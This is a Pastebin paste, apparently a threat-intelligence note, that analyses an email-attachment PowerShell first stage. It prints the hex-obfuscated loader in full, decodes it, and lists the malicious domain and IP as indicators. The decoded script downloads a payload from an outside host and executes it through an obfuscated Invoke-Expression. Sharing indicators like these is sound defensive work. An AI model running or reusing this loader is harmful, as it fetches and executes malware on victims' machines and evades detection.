Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 18/08/20
- - - - - -
- email attach threat, initial stage of PowerShell invoking
- https://pastebin.com/idP8UWci
- $NjBXI='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^70^72^69^76^61^74^6E^69^64^6F^6B^74^6F^72^69^63^61^63^61^6B^2E^63^6F^6D^2F^51^39^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$NjBXI.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
- ########################### decoded
- $Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $p22;$mv='(N'+'ew'+'-O'+'b'+'je'+'c'+'t '+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''http://privatnidoktoricacak.com/Q9.jpg'')'|I`E`X;$asciiChars= $mv -split '-' |ForEach-Object {[char][byte]"0x$_"};$asciiString= $asciiChars -join ''|M
- 217.26.215.27 privatnidoktoricacak{.} com/Q9.jpg
Add Comment
Please, Sign In to add comment
